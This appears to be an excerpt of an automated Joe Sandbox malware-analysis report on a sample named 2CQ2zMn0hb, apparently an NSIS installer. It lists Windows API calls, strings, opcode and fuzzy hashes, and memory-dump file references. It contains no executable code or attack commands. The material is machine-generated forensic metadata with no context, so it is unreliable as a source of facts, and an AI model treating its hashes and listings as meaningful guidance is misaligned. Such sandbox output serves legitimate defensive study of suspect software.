                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$Enum
                                                                                                              • String ID:
                                                                                                              • API String ID: 464197530-0
                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID:
                                                                                                              • API String ID: 3449924974-0
                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                              APIs
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0,00000000), ref: 00405E1E
                                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75922EE0,00405B1A,?,00437800,75922EE0), ref: 00405E2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: 0_B
                                                                                                              • API String ID: 3248276644-2128305573
                                                                                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,75923420,004036EF), ref: 00405F46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: nsa
                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                              • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                              • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                              • API String ID: 0-4015495023
                                                                                                              • Opcode ID: 78e84299092b22e347fb1ef3da7efbf56738a6e020586462f942bb3b72f999b8
                                                                                                              • Instruction ID: d0932c7e45d583259275ee1318d8f83b5ee2e164a1a3b18531ac185df81bda38
                                                                                                              • Opcode Fuzzy Hash: 78e84299092b22e347fb1ef3da7efbf56738a6e020586462f942bb3b72f999b8
                                                                                                              • Instruction Fuzzy Hash: B8318030E0121A9FDF658FB9CD403AEBAB6BF84310F1940A9C815A7254EB70CD95DB92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                              • API String ID: 0-2351511683
                                                                                                              • Opcode ID: e4cd259a7335f4fb89384a10b153eb6c6cbefaec9de186159f5a471b1d0b5c98
                                                                                                              • Instruction ID: f76c8724b9a3b84dfbcdeaa467bc0c631769f37ac3b2c0d2e4a37d53c9ac6b21
                                                                                                              • Opcode Fuzzy Hash: e4cd259a7335f4fb89384a10b153eb6c6cbefaec9de186159f5a471b1d0b5c98
                                                                                                              • Instruction Fuzzy Hash: F4018431740915CFCB688E2DCC9092577EBAF88778B254569E445CB374DB31DC51C790
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98